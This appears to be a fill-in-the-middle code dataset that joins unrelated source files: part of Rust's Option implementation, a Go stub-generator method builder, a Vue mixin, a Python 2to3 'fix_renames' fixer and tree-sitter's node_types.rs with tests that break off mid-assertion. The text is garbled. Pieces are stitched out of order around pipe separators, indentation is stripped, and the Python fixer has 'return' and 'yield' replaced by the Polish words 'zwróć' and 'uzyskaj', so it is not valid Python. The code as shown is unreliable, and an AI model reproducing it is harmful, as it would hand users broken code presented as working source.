#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> ExactSizeIterator for IterMut<'a, A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<'a, A> FusedIterator for IterMut<'a, A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<'a, A> TrustedLen for IterMut<'a, A> {}
/// An iterator over the value in [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::into_iter`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::into_iter`]: enum.Option.html#method.into_iter
#[derive(Clone, Debug)]
#[stable(feature = "rust1", since = "1.0.0")]
pub struct IntoIter<A> { inner: Item<A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> Iterator for IntoIter<A> {
type Item = A;
#[inline]
fn next(&mut self) -> Option<A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> DoubleEndedIterator for IntoIter<A> {
#[inline]
fn next_back(&mut self) -> Option<A> { self.inner.next_back() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<A> ExactSizeIterator for IntoIter<A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<A> FusedIterator for IntoIter<A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<A> TrustedLen for IntoIter<A> {}
/////////////////////////////////////////////////////////////////////////////
// FromIterator
/////////////////////////////////////////////////////////////////////////////
#[stable(feature = "rust1", since = "1.0.0")]
impl<A, V: FromIterator<A>> FromIterator<Option<A>> for Option<V> {
/// Takes each element in the [`Iterator`]: if it is [`None`], no further
/// elements are taken, and the [`None`] is returned. Should no [`None`] occur, a
/// container with the values of each `Option` is returned.
///
/// Here is an example which increments every integer in a vector,
/// checking for overflow:
///
/// ```
/// use std::u16;
///
/// let v = vec![1, 2];
/// let res: Option<Vec<u16>> = v.iter().map(|&x: &u16|
/// if x == u16::MAX { None }
/// else { Some(x + 1) }
/// ).collect();
/// assert!(res == Some(vec![2, 3]));
/// ```
///
/// [`Iterator`]: ../iter/trait.Iterator.html
/// [`None`]: enum.Option.html#variant.None
#[inline]
fn from_iter<I: IntoIterator<Item=Option<A>>>(iter: I) -> Option<V> {
// FIXME(#11084): This could be replaced with Iterator::scan when this
// performance bug is closed.
struct Adapter<Iter> {
iter: Iter,
found_none: bool,
}
impl<T, Iter: Iterator<Item=Option<T>>> Iterator for Adapter<Iter> {
type Item = T;
#[inline]
fn next(&mut self) -> Option<T> {
match self.iter.next() {
Some(Some(value)) => Some(value),
Some(None) => {
self.found_none = true;
None
}
None => None,
}
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
if self.found_none {
(0, Some(0))
} else {
let (_, upper) = self.iter.size_hint();
(0, upper)
}
}
}
let mut adapter = Adapter { iter: iter.into_iter(), found_none: false };
let v: V = FromIterator::from_iter(adapter.by_ref());
if adapter.found_none {
None
} else {
Some(v)
}
}
}
/// The error type that results from applying the try operator (`?`) to a `None` value. If you wish
/// to allow `x?` (where `x` is an `Option<T>`) to be converted into your error type, you can
/// implement `impl From<NoneError>` for `YourErrorType`. In that case, `x?` within a function that
/// returns `Result<_, YourErrorType>` will translate a `None` value into an `Err` result.
#[unstable(feature = "try_trait", issue = "42327")]
#[derive(Clone, Copy, PartialEq, PartialOrd, Eq, Ord, Debug, Hash)]
pub struct NoneError;
#[unstable(feature = "try_trait", issue = "42327")]
impl<T> ops::Try for Option<T> {
type Ok = T;
type Error = NoneError;
#[inline]
fn into_result(self) -> Result<T, NoneError> {
self.ok_or(NoneError)
}
#[inline]
fn from_ok(v: T) -> Self {
Some(v)
}
#[inline]
fn from_error(_: NoneError) -> Self {
None
}
}
| and_then |
count_method_builder.go | package generator
import "go/ast"
func | (methodBuilder *MethodBuilder) *CountMethodBuilder {
return &CountMethodBuilder{
methodBuilder: methodBuilder,
}
}
// CountMethodBuilder is responsible for creating a method on the stub
// structure that allows you to check how many times the stubbed method
// was called.
//
// Example:
// func (stub *StubStruct) SumCallCount() int {
// // ...
// }
type CountMethodBuilder struct {
methodBuilder *MethodBuilder
mutexFieldSelector *ast.SelectorExpr
argsFieldSelector *ast.SelectorExpr
}
func (b *CountMethodBuilder) SetMutexFieldSelector(selector *ast.SelectorExpr) {
b.mutexFieldSelector = selector
}
func (b *CountMethodBuilder) SetArgsFieldSelector(selector *ast.SelectorExpr) {
b.argsFieldSelector = selector
}
func (b *CountMethodBuilder) Build() ast.Decl {
mutexLockBuilder := NewMutexActionBuilder()
mutexLockBuilder.SetMutexFieldSelector(b.mutexFieldSelector)
mutexLockBuilder.SetAction("RLock")
mutexUnlockBuilder := NewMutexActionBuilder()
mutexUnlockBuilder.SetMutexFieldSelector(b.mutexFieldSelector)
mutexUnlockBuilder.SetAction("RUnlock")
mutexUnlockBuilder.SetDeferred(true)
b.methodBuilder.SetType(&ast.FuncType{
Params: &ast.FieldList{},
Results: &ast.FieldList{
List: []*ast.Field{
{
Type: ast.NewIdent("int"),
},
},
},
})
b.methodBuilder.AddStatementBuilder(mutexLockBuilder)
b.methodBuilder.AddStatementBuilder(mutexUnlockBuilder)
b.methodBuilder.AddStatementBuilder(StatementToBuilder(&ast.ReturnStmt{
Results: []ast.Expr{
&ast.CallExpr{
Fun: ast.NewIdent("len"),
Args: []ast.Expr{
b.argsFieldSelector,
},
},
},
}))
return b.methodBuilder.Build()
}
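// Sketch of the generated output (added commentary, not part of the original
// file; the field names below are illustrative and in practice come from the
// configured mutex/args selectors):
//
//	func (stub *StubStruct) SumCallCount() int {
//		stub.sumMutex.RLock()
//		defer stub.sumMutex.RUnlock()
//		return len(stub.sumArgsForCall)
//	}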
| NewCountMethodBuilder |
mixin.js | import CommonIcon from '_c/common-icon'
import { showTitle } from '@/libs/util' | export default {
components: {
CommonIcon
},
methods: {
showTitle (item) {
return showTitle(item, this)
},
showChildren (item) {
return item.children && item.children.length
},
getNameOrHref (item, children0) {
return item.href ? `isTurnByHref_${item.href}` : (children0 ? item.children[0].path : item.path)
}
}
} | |
fix_renames.py | """Fix incompatible renames
Fixes:
* sys.maxint -> sys.maxsize
"""
# Author: Christian Heimes
# based on Collin Winter's fix_import
# Local imports
from .. import fixer_base
from ..fixer_util import Name, attr_chain
MAPPING = {"sys": {"maxint" : "maxsize"},
}
LOOKUP = {}
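# Illustrative (added commentary, not in the original file): with this mapping
# the fixer rewrites, for example,
#   sys.maxint              ->  sys.maxsize
#   from sys import maxint  ->  from sys import maxsize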
def alternates(members):
zwróć "(" + "|".join(map(repr, members)) + ")"
def build_pattern():
#bare = set()
    for module, replace in list(MAPPING.items()):
        for old_attr, new_attr in list(replace.items()):
LOOKUP[(module, old_attr)] = new_attr
#bare.add(module) | # import_name< 'import' (module=%r
# | dotted_as_names< any* module=%r any* >) >
# """ % (module, module)
uzyskaj """
import_from< 'from' module_name=%r 'import'
( attr_name=%r | import_as_name< attr_name=%r 'as' any >) >
""" % (module, old_attr, old_attr)
uzyskaj """
power< module_name=%r trailer< '.' attr_name=%r > any* >
""" % (module, old_attr)
#uzyskaj """bare_name=%s""" % alternates(bare)
class FixRenames(fixer_base.BaseFix):
    BM_compatible = True
PATTERN = "|".join(build_pattern())
order = "pre" # Pre-order tree traversal
    # Don't match the node if it's within another match
def match(self, node):
match = super(FixRenames, self).match
results = match(node)
        if results:
            if any(match(obj) for obj in attr_chain(node, "parent")):
                return False
            return results
        return False
#def start_tree(self, tree, filename):
# super(FixRenames, self).start_tree(tree, filename)
# self.replace = {}
def transform(self, node, results):
mod_name = results.get("module_name")
attr_name = results.get("attr_name")
#bare_name = results.get("bare_name")
#import_mod = results.get("module")
        if mod_name and attr_name:
new_attr = LOOKUP[(mod_name.value, attr_name.value)]
attr_name.replace(Name(new_attr, prefix=attr_name.prefix)) | #bare.add(old_attr)
#uzyskaj """ |
node_types.rs | use super::grammars::{LexicalGrammar, SyntaxGrammar, VariableType};
use super::rules::{Alias, AliasMap, Symbol, SymbolType};
use crate::error::{Error, Result};
use serde_derive::Serialize;
use std::collections::{BTreeMap, HashMap, HashSet};
#[derive(Clone, Debug, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub(crate) enum ChildType {
Normal(Symbol),
Aliased(Alias),
}
#[derive(Clone, Debug, Default, PartialEq, Eq)]
pub(crate) struct FieldInfo {
pub quantity: ChildQuantity,
pub types: Vec<ChildType>,
}
#[derive(Clone, Debug, Default, PartialEq, Eq)]
pub(crate) struct VariableInfo {
pub fields: HashMap<String, FieldInfo>,
pub children: FieldInfo,
pub children_without_fields: FieldInfo,
pub has_multi_step_production: bool,
}
#[derive(Debug, Serialize, PartialEq, Eq, Default, PartialOrd, Ord)]
pub(crate) struct NodeInfoJSON {
#[serde(rename = "type")]
kind: String,
named: bool,
#[serde(skip_serializing_if = "Option::is_none")]
fields: Option<BTreeMap<String, FieldInfoJSON>>,
#[serde(skip_serializing_if = "Option::is_none")]
children: Option<FieldInfoJSON>,
#[serde(skip_serializing_if = "Option::is_none")]
subtypes: Option<Vec<NodeTypeJSON>>,
}
#[derive(Clone, Debug, Serialize, PartialEq, Eq, PartialOrd, Ord, Hash)]
pub(crate) struct NodeTypeJSON {
#[serde(rename = "type")]
kind: String,
named: bool,
}
#[derive(Debug, Serialize, PartialEq, Eq, PartialOrd, Ord)]
pub(crate) struct FieldInfoJSON {
multiple: bool,
required: bool,
types: Vec<NodeTypeJSON>,
}
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub struct ChildQuantity {
exists: bool,
required: bool,
multiple: bool,
}
impl Default for FieldInfoJSON {
fn default() -> Self {
FieldInfoJSON {
multiple: false,
required: true,
types: Vec::new(),
}
}
}
impl Default for ChildQuantity {
fn default() -> Self {
Self::one()
}
}
impl ChildQuantity {
fn zero() -> Self {
ChildQuantity {
exists: false,
required: false,
multiple: false,
}
}
fn one() -> Self {
ChildQuantity {
exists: true,
required: true,
multiple: false,
}
}
fn append(&mut self, other: ChildQuantity) {
if other.exists {
if self.exists || other.multiple {
self.multiple = true;
}
if other.required {
self.required = true;
}
self.exists = true;
}
}
fn union(&mut self, other: ChildQuantity) -> bool {
let mut result = false;
if !self.exists && other.exists {
result = true;
self.exists = true;
}
if self.required && !other.required {
result = true;
self.required = false;
}
if !self.multiple && other.multiple {
result = true;
self.multiple = true;
}
result
}
}
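// A worked example of `union` as change detection (a sketch): starting from
// `ChildQuantity::one()` (exists, required, not multiple), merging in the
// `ChildQuantity::zero()` of a production that lacks the child clears
// `required` and returns `true`, signalling another fixpoint iteration.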
/// Compute a summary of the public-facing structure of each variable in the
/// grammar. Each variable in the grammar corresponds to a distinct public-facing
/// node type.
///
/// The information collected about each node type `N` is:
/// 1. `child_types` - The types of visible children that can appear within `N`.
/// 2. `fields` - The fields that `N` can have. Data regarding each field:
/// * `types` - The types of visible children the field can contain.
///    * `required` - Do `N` nodes always have this field?
/// * `multiple` - Can `N` nodes have multiple children for this field?
/// 3. `children_without_fields` - The *other* named children of `N` that are
/// not associated with fields. Data regarding these children:
/// * `types` - The types of named children with no field.
///    * `required` - Do `N` nodes always have at least one named child with no field?
/// * `multiple` - Can `N` nodes have multiple named children with no field?
///
/// Each summary must account for some indirect factors:
/// 1. hidden nodes. When a parent node `N` has a hidden child `C`, the visible
/// children of `C` *appear* to be direct children of `N`.
/// 2. aliases. If a parent node type `M` is aliased as some other type `N`,
/// then nodes which *appear* to have type `N` may have internal structure based
/// on `M`.
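///
/// As a small illustration (a sketch mirroring `test_node_types_simple` below):
/// for a rule `v1 -> field("f1", v2) field("f2", ";")`, the summary for `v1`
/// records two required, non-repeated fields: `f1` with child type `v2` and
/// `f2` with child type `";"`.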
pub(crate) fn get_variable_info(
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
simple_aliases: &AliasMap,
) -> Result<Vec<VariableInfo>> {
let child_type_is_visible = |t: &ChildType| {
variable_type_for_child_type(t, syntax_grammar, lexical_grammar) >= VariableType::Anonymous
};
let child_type_is_named = |t: &ChildType| {
variable_type_for_child_type(t, syntax_grammar, lexical_grammar) == VariableType::Named
};
// Each variable's summary can depend on the summaries of other hidden variables,
// and variables can have mutually recursive structure. So we compute the summaries
// iteratively, in a loop that terminates only when no more changes are possible.
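    // Termination sketch: `extend_sorted` reports a change only when a sorted,
    // bounded type list actually grows, and `ChildQuantity::union` only when a
    // flag flips in one direction, so the loop always reaches a fixpoint.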
let mut did_change = true;
let mut all_initialized = false;
let mut result = vec![VariableInfo::default(); syntax_grammar.variables.len()];
while did_change {
did_change = false;
for (i, variable) in syntax_grammar.variables.iter().enumerate() {
let mut variable_info = result[i].clone();
// Examine each of the variable's productions. The variable's child types can be
// immediately combined across all productions, but the child quantities must be
// recorded separately for each production.
for production in &variable.productions {
let mut production_field_quantities = HashMap::new();
let mut production_children_quantity = ChildQuantity::zero();
let mut production_children_without_fields_quantity = ChildQuantity::zero();
let mut production_has_uninitialized_invisible_children = false;
if production.steps.len() > 1 {
variable_info.has_multi_step_production = true;
}
for step in &production.steps {
let child_symbol = step.symbol;
let child_type = if let Some(alias) = &step.alias {
ChildType::Aliased(alias.clone())
} else if let Some(alias) = simple_aliases.get(&step.symbol) {
ChildType::Aliased(alias.clone())
} else {
ChildType::Normal(child_symbol)
};
let child_is_hidden = !child_type_is_visible(&child_type)
&& !syntax_grammar.supertype_symbols.contains(&child_symbol);
// Maintain the set of all child types for this variable, and the quantity of
// visible children in this production.
did_change |=
extend_sorted(&mut variable_info.children.types, Some(&child_type));
if !child_is_hidden {
production_children_quantity.append(ChildQuantity::one());
}
// Maintain the set of child types associated with each field, and the quantity
// of children associated with each field in this production.
if let Some(field_name) = &step.field_name {
let field_info = variable_info
.fields
.entry(field_name.clone())
.or_insert(FieldInfo::default());
did_change |= extend_sorted(&mut field_info.types, Some(&child_type));
let production_field_quantity = production_field_quantities
.entry(field_name)
.or_insert(ChildQuantity::zero());
// Inherit the types and quantities of hidden children associated with fields.
if child_is_hidden && child_symbol.is_non_terminal() {
let child_variable_info = &result[child_symbol.index];
did_change |= extend_sorted(
&mut field_info.types,
&child_variable_info.children.types,
);
production_field_quantity.append(child_variable_info.children.quantity);
} else {
production_field_quantity.append(ChildQuantity::one());
}
}
// Maintain the set of named children without fields within this variable.
else if child_type_is_named(&child_type) {
production_children_without_fields_quantity.append(ChildQuantity::one());
did_change |= extend_sorted(
&mut variable_info.children_without_fields.types,
Some(&child_type),
);
}
// Inherit all child information from hidden children.
if child_is_hidden && child_symbol.is_non_terminal() {
let child_variable_info = &result[child_symbol.index];
// If a hidden child can have multiple children, then its parent node can
// appear to have multiple children.
if child_variable_info.has_multi_step_production {
variable_info.has_multi_step_production = true;
}
// If a hidden child has fields, then the parent node can appear to have
// those same fields.
for (field_name, child_field_info) in &child_variable_info.fields {
production_field_quantities
.entry(field_name)
.or_insert(ChildQuantity::zero())
.append(child_field_info.quantity);
did_change |= extend_sorted(
&mut variable_info
.fields
.entry(field_name.clone())
.or_insert(FieldInfo::default())
.types,
&child_field_info.types,
);
}
// If a hidden child has children, then the parent node can appear to have
// those same children.
production_children_quantity.append(child_variable_info.children.quantity);
did_change |= extend_sorted(
&mut variable_info.children.types,
&child_variable_info.children.types,
);
// If a hidden child can have named children without fields, then the parent
// node can appear to have those same children.
if step.field_name.is_none() {
let grandchildren_info = &child_variable_info.children_without_fields;
if !grandchildren_info.types.is_empty() {
production_children_without_fields_quantity
.append(child_variable_info.children_without_fields.quantity);
did_change |= extend_sorted(
&mut variable_info.children_without_fields.types,
&child_variable_info.children_without_fields.types,
);
}
}
}
// Note whether or not this production contains children whose summaries
// have not yet been computed.
if child_symbol.index >= i && !all_initialized {
production_has_uninitialized_invisible_children = true;
}
}
// If this production's children all have had their summaries initialized,
// then expand the quantity information with all of the possibilities introduced
// by this production.
if !production_has_uninitialized_invisible_children {
did_change |= variable_info
.children
.quantity
.union(production_children_quantity);
did_change |= variable_info
.children_without_fields
.quantity
.union(production_children_without_fields_quantity);
for (field_name, info) in variable_info.fields.iter_mut() {
did_change |= info.quantity.union(
production_field_quantities
.get(field_name)
.cloned()
.unwrap_or(ChildQuantity::zero()),
);
}
}
}
result[i] = variable_info;
}
all_initialized = true;
}
for supertype_symbol in &syntax_grammar.supertype_symbols {
if result[supertype_symbol.index].has_multi_step_production {
let variable = &syntax_grammar.variables[supertype_symbol.index];
return Err(Error::grammar(&format!(
"Supertype symbols must always have a single visible child, but `{}` can have multiple",
variable.name
)));
}
}
// Update all of the node type lists to eliminate hidden nodes.
for supertype_symbol in &syntax_grammar.supertype_symbols {
result[supertype_symbol.index]
.children
.types
.retain(child_type_is_visible);
}
for variable_info in result.iter_mut() {
for (_, field_info) in variable_info.fields.iter_mut() {
field_info.types.retain(child_type_is_visible);
}
variable_info.fields.retain(|_, v| !v.types.is_empty());
variable_info
.children_without_fields
.types
.retain(child_type_is_visible);
}
Ok(result)
}
pub(crate) fn generate_node_types_json(
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
simple_aliases: &AliasMap,
variable_info: &Vec<VariableInfo>,
) -> Vec<NodeInfoJSON> {
let mut node_types_json = BTreeMap::new();
let child_type_to_node_type = |child_type: &ChildType| match child_type {
ChildType::Aliased(alias) => NodeTypeJSON {
kind: alias.value.clone(),
named: alias.is_named,
},
ChildType::Normal(symbol) => {
if let Some(alias) = simple_aliases.get(&symbol) {
NodeTypeJSON {
kind: alias.value.clone(),
named: alias.is_named,
}
} else {
match symbol.kind {
SymbolType::NonTerminal => {
let variable = &syntax_grammar.variables[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
SymbolType::Terminal => {
let variable = &lexical_grammar.variables[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
SymbolType::External => {
let variable = &syntax_grammar.external_tokens[symbol.index];
NodeTypeJSON {
kind: variable.name.clone(),
named: variable.kind != VariableType::Anonymous,
}
}
_ => panic!("Unexpected symbol type"),
}
}
}
};
let populate_field_info_json = |json: &mut FieldInfoJSON, info: &FieldInfo| {
if info.types.len() > 0 {
json.multiple |= info.quantity.multiple;
json.required &= info.quantity.required;
json.types
.extend(info.types.iter().map(child_type_to_node_type));
json.types.sort_unstable();
json.types.dedup();
} else {
json.required = false;
}
};
let mut aliases_by_symbol = HashMap::new();
for (symbol, alias) in simple_aliases {
aliases_by_symbol.insert(*symbol, {
let mut aliases = HashSet::new();
aliases.insert(Some(alias.clone()));
aliases
});
}
for variable in &syntax_grammar.variables {
for production in &variable.productions {
for step in &production.steps {
if !simple_aliases.contains_key(&step.symbol) {
aliases_by_symbol
.entry(step.symbol)
.or_insert(HashSet::new())
.insert(step.alias.clone());
}
}
}
}
aliases_by_symbol.insert(Symbol::non_terminal(0), [None].iter().cloned().collect());
let mut subtype_map = HashMap::new();
for (i, info) in variable_info.iter().enumerate() {
let symbol = Symbol::non_terminal(i);
let variable = &syntax_grammar.variables[i];
if syntax_grammar.supertype_symbols.contains(&symbol) {
let node_type_json =
node_types_json
.entry(variable.name.clone())
.or_insert_with(|| NodeInfoJSON {
kind: variable.name.clone(),
named: true,
fields: None,
children: None,
subtypes: None,
});
let mut subtypes = info
.children
.types
.iter()
.map(child_type_to_node_type)
.collect::<Vec<_>>();
subtype_map.insert(
NodeTypeJSON {
kind: node_type_json.kind.clone(),
named: true,
},
subtypes.clone(),
);
subtypes.sort_unstable();
subtypes.dedup();
node_type_json.subtypes = Some(subtypes);
} else if !syntax_grammar.variables_to_inline.contains(&symbol) {
// If a rule is aliased under multiple names, then its information
// contributes to multiple entries in the final JSON.
for alias in aliases_by_symbol
.get(&Symbol::non_terminal(i))
.unwrap_or(&HashSet::new())
{
let kind;
let is_named;
if let Some(alias) = alias {
kind = &alias.value;
is_named = alias.is_named;
} else if variable.kind.is_visible() {
kind = &variable.name;
is_named = variable.kind == VariableType::Named;
} else {
continue;
}
// There may already be an entry with this name, because multiple
// rules may be aliased with the same name.
let mut node_type_existed = true;
let node_type_json = node_types_json.entry(kind.clone()).or_insert_with(|| {
node_type_existed = false;
NodeInfoJSON {
kind: kind.clone(),
named: is_named,
fields: Some(BTreeMap::new()),
children: None,
subtypes: None,
}
});
let fields_json = node_type_json.fields.as_mut().unwrap();
for (new_field, field_info) in info.fields.iter() {
let field_json = fields_json.entry(new_field.clone()).or_insert_with(|| {
// If another rule is aliased with the same name, and does *not* have this field,
// then this field cannot be required.
let mut field_json = FieldInfoJSON::default();
if node_type_existed {
field_json.required = false;
}
field_json
});
populate_field_info_json(field_json, field_info);
}
// If another rule is aliased with the same name, any fields that aren't present in this
// cannot be required.
for (existing_field, field_json) in fields_json.iter_mut() {
if !info.fields.contains_key(existing_field) {
field_json.required = false;
}
}
populate_field_info_json(
node_type_json
.children
.get_or_insert(FieldInfoJSON::default()),
&info.children_without_fields,
);
}
}
}
for (_, node_type_json) in node_types_json.iter_mut() {
if node_type_json
.children
.as_ref()
.map_or(false, |c| c.types.is_empty())
{
node_type_json.children = None;
}
if let Some(children) = &mut node_type_json.children {
process_supertypes(children, &subtype_map);
}
if let Some(fields) = &mut node_type_json.fields {
for (_, field_info) in fields.iter_mut() {
process_supertypes(field_info, &subtype_map);
}
}
}
let mut anonymous_node_types = Vec::new();
let empty = HashSet::new();
let regular_tokens = lexical_grammar
.variables
.iter()
.enumerate()
.flat_map(|(i, variable)| {
aliases_by_symbol
.get(&Symbol::terminal(i))
.unwrap_or(&empty)
.iter()
.map(move |alias| {
if let Some(alias) = alias {
(&alias.value, alias.kind())
} else {
(&variable.name, variable.kind)
}
})
});
let external_tokens =
syntax_grammar
.external_tokens
.iter()
.enumerate()
.flat_map(|(i, token)| {
aliases_by_symbol
.get(&Symbol::external(i))
.unwrap_or(&empty)
.iter()
.map(move |alias| {
if let Some(alias) = alias {
(&alias.value, alias.kind())
} else {
(&token.name, token.kind)
}
})
});
for (name, kind) in regular_tokens.chain(external_tokens) {
match kind {
VariableType::Named => {
let node_type_json = node_types_json.entry(name.clone()).or_insert(NodeInfoJSON {
kind: name.clone(),
named: true,
fields: None,
children: None,
subtypes: None,
});
if let Some(children) = &mut node_type_json.children {
children.required = false;
}
if let Some(fields) = &mut node_type_json.fields {
for (_, field) in fields.iter_mut() {
field.required = false;
}
}
}
VariableType::Anonymous => anonymous_node_types.push(NodeInfoJSON {
kind: name.clone(),
named: false,
fields: None,
children: None,
subtypes: None,
}),
_ => {}
}
}
let mut result = node_types_json.into_iter().map(|e| e.1).collect::<Vec<_>>();
result.extend(anonymous_node_types.into_iter());
result.sort_unstable_by(|a, b| {
b.subtypes
.is_some()
.cmp(&a.subtypes.is_some())
.then_with(|| {
let a_is_leaf = a.children.is_none() && a.fields.is_none();
let b_is_leaf = b.children.is_none() && b.fields.is_none();
a_is_leaf.cmp(&b_is_leaf)
})
.then_with(|| a.kind.cmp(&b.kind))
});
result.dedup();
result
}
fn process_supertypes(
info: &mut FieldInfoJSON,
subtype_map: &HashMap<NodeTypeJSON, Vec<NodeTypeJSON>>,
) {
for (supertype, subtypes) in subtype_map {
if info.types.contains(supertype) {
info.types.retain(|t| !subtypes.contains(t));
}
}
}
fn variable_type_for_child_type(
child_type: &ChildType,
syntax_grammar: &SyntaxGrammar,
lexical_grammar: &LexicalGrammar,
) -> VariableType {
match child_type {
ChildType::Aliased(alias) => alias.kind(),
ChildType::Normal(symbol) => {
if syntax_grammar.supertype_symbols.contains(&symbol) {
VariableType::Named
} else if syntax_grammar.variables_to_inline.contains(&symbol) {
VariableType::Hidden
} else {
match symbol.kind {
SymbolType::NonTerminal => syntax_grammar.variables[symbol.index].kind,
SymbolType::Terminal => lexical_grammar.variables[symbol.index].kind,
SymbolType::External => syntax_grammar.external_tokens[symbol.index].kind,
_ => VariableType::Hidden,
}
}
}
}
}
fn extend_sorted<'a, T>(vec: &mut Vec<T>, values: impl IntoIterator<Item = &'a T>) -> bool
where
T: Clone + Eq + Ord,
T: 'a,
{
values.into_iter().any(|value| {
if let Err(i) = vec.binary_search(&value) {
vec.insert(i, value.clone());
true
} else {
false
}
})
}
#[cfg(test)]
mod tests {
use super::*;
use crate::generate::grammars::{
InputGrammar, LexicalVariable, Production, ProductionStep, SyntaxVariable, Variable,
};
use crate::generate::prepare_grammar::prepare_grammar;
use crate::generate::rules::Rule;
#[test]
fn test_node_types_simple() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::field("f1".to_string(), Rule::named("v2")),
Rule::field("f2".to_string(), Rule::string(";")),
]),
},
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![
(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "v2".to_string(),
named: true,
}]
}
),
(
"f2".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: ";".to_string(),
named: false,
}]
}
),
]
.into_iter()
.collect()
)
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: ";".to_string(),
named: false,
subtypes: None,
children: None,
fields: None
}
);
assert_eq!(
node_types[2],
NodeInfoJSON {
kind: "v2".to_string(),
named: true,
subtypes: None,
children: None,
fields: None
}
);
}
#[test]
fn test_node_types_with_supertypes() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec!["_v2".to_string()],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::field("f1".to_string(), Rule::named("_v2")),
},
Variable {
name: "_v2".to_string(),
kind: VariableType::Hidden,
rule: Rule::choice(vec![
Rule::named("v3"),
Rule::named("v4"),
Rule::string("*"),
]),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
Variable {
name: "v4".to_string(),
kind: VariableType::Named,
rule: Rule::string("y"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "_v2".to_string(),
named: true,
fields: None,
children: None,
subtypes: Some(vec![
NodeTypeJSON {
kind: "*".to_string(),
named: false,
},
NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},
NodeTypeJSON {
kind: "v4".to_string(),
named: true,
},
]),
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: None,
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "_v2".to_string(),
named: true,
}]
}
),]
.into_iter()
.collect()
)
}
);
}
#[test]
fn test_node_types_for_children_without_fields() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: Vec::new(),
word_token: None,
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::named("v2"),
Rule::field("f1".to_string(), Rule::named("v3")),
Rule::named("v4"),
]),
},
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![
Rule::string("{"),
Rule::choice(vec![Rule::named("v3"), Rule::Blank]),
Rule::string("}"),
]),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("x"),
},
Variable {
name: "v4".to_string(),
kind: VariableType::Named,
rule: Rule::string("y"),
},
],
});
assert_eq!(
node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "v2".to_string(),
named: true,
},
NodeTypeJSON {
kind: "v4".to_string(),
named: true,
},
]
}),
fields: Some(
vec![(
"f1".to_string(),
FieldInfoJSON {
multiple: false,
required: true,
types: vec![NodeTypeJSON {
kind: "v3".to_string(),
named: true,
}]
}
),]
.into_iter()
.collect()
)
}
);
assert_eq!(
node_types[1],
NodeInfoJSON {
kind: "v2".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: false,
required: false,
types: vec![NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},]
}),
fields: Some(BTreeMap::new()),
}
);
}
#[test]
fn test_node_types_with_inlined_rules() {
let node_types = get_node_types(InputGrammar {
name: String::new(),
word_token: None,
extra_symbols: Vec::new(),
external_tokens: Vec::new(),
expected_conflicts: Vec::new(),
variables_to_inline: vec!["v2".to_string()],
supertype_symbols: vec![],
variables: vec![
Variable {
name: "v1".to_string(),
kind: VariableType::Named,
rule: Rule::seq(vec![Rule::named("v2"), Rule::named("v3")]),
},
// v2 should not appear in the node types, since it is inlined
Variable {
name: "v2".to_string(),
kind: VariableType::Named,
rule: Rule::alias(Rule::string("a"), "x".to_string(), true),
},
Variable {
name: "v3".to_string(),
kind: VariableType::Named,
rule: Rule::string("b"),
},
],
});
        assert_eq!(
            node_types[0],
NodeInfoJSON {
kind: "v1".to_string(),
named: true,
subtypes: None,
children: Some(FieldInfoJSON {
multiple: true,
required: true,
types: vec![
NodeTypeJSON {
kind: "v3".to_string(),
named: true,
},
NodeTypeJSON {
